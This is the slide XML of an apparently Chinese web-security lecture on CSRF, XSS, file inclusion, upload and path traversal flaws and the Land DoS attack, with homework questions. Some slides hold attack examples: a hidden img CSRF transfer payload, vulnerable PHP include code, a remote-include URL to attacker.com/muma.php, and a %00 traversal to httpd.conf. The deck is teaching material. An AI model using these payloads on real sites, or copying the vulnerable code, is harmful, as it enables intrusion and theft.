  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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1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971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>标记、验证码或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>引用头检查，以防功能被第三方网站所执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防盗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绑定来降低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>泄露后的危险</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确认接收的内容被妥善地规范化，仅包含最小的、安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意脚本危害）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push di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跨站请求伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者利用目标站点对用户的信任，诱使或强迫用户传输一些未授权的明另到该站点，从而打到攻击目的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现跨站访问</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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利用案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1382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假设服务器允许用户提交不包含任何保密字段的状态改变请求：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者在多个页面嵌入以下代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src="http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#" width="0" height="0"/&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="5229200"/>
            <a:ext cx="5975350" cy="122555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t>受害者点击该图片链接后会发生什么？</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与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>区别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1392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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用站点内的信任用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过伪装来自受信任用户的请求来利用受信任的网站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1402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文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的特性去包含任意文件时，由于对文件来源过滤不严，从而可去包含一个攻击者指定的恶意文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行包含文件功能的函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1413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include()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>require()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>include_once()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>require_once()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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利用案例</a:t>
            </a:r>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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>if($_GET[page]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	include $_GET[page];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	include "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>home.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1922463" y="2565400"/>
            <a:ext cx="5257800" cy="1871663"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18757"/>
              <a:gd name="adj2" fmla="val -631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点击下面链接会发生什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http://abc-app.com/example.php?page=http://attacker.com/muma.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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上传漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1433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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网站没有对用户上传的文件后缀名进行检测或过滤，允许上传任意类型的文件，并且告知用户文件上传后保存在服务器的地址，则攻击者可上传一个服务器可解释执行的脚本文件，然后可远程访问执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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路径遍历漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1443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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果文件名可更改，且服务器支持路径回溯操作“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”、“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”，从而使攻击者越权访问或覆盖敏感数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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利用案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1454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2400"/>
              <a:t>&lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>if (!isset($_GET['page'])) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>    $loadme = "inc/backend_postiongs.php";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>    $loadme = "inc/backend_".$_GET['page'].".php";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>include ($loadme);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="3787775"/>
            <a:ext cx="2808288" cy="1511300"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -9231"/>
              <a:gd name="adj2" fmla="val -584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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可以构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>值对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/backend_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前缀文件进行读取</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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标准</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对漏洞作简要说明</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Land</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Land</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>是一个非常著名的拒绝服务攻击的例子</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>。该攻击的主要原理就是构造一个伪造源地</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>址等于目的地址的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>数据包。当存在相应漏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>洞的主机收到这样的攻击包，会由于不断的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>自我响应造成系统资源的过度消耗和崩溃。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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利用案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1464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上述案例中，对于提交的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>值会自动加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后缀，如果要读取其它类型文件，如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>怎么办？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339975" y="3500438"/>
            <a:ext cx="5976938" cy="1873250"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18195"/>
              <a:gd name="adj2" fmla="val -727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t>http://abc-app.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>=/../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>/httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>、请描述远程主动攻击模式和远程被动攻击模式之间的区别，并列出目前典型的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>编号和攻击实例。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>、请查阅并列举微软公布的其对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>安全漏洞的分类和处理方式。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>、请从分配方式、使用情况以及释放方式等方面来对比分析堆和栈的区别。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>、什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>注入，其本质原因是什么，如何防范？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>、反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>和基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>的区别是什么？比较</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>的异同点。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u"/>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67544" y="1039962"/>
            <a:ext cx="8229600" cy="5818038"/>
          </a:xfrm>
